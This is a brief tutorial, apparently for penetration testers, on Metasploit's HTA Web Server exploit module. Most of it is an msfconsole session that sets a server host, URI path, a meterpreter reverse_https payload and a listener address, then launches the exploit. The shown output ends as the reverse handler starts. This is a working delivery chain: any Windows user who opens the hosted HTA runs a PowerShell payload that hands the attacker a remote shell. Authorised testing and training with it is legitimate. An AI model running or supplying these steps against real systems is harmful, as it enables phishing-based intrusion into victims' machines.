HTML Application (HTA) is an HTML Microsoft Windows program capable of running scripting languages, such as VBScript or JScript. The Metasploit HTA Web Server exploit module hosts an HTA that when opened runs a payload via PowerShell.
To use, simply set the IP for the server, a custom URI, the payload you which to execute, and the IP of the listener:
root@kali:~# msfconsole -q msf > use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf exploit(windows/misc/hta_server) > set URIPATH form URIPATH => form msf exploit(windows/misc/hta_server) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(windows/misc/hta_server) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(windows/misc/hta_server) > exploit [*] Exploit running as background job 0. [*] Started HTTPS reverse handler on https://192.168.216...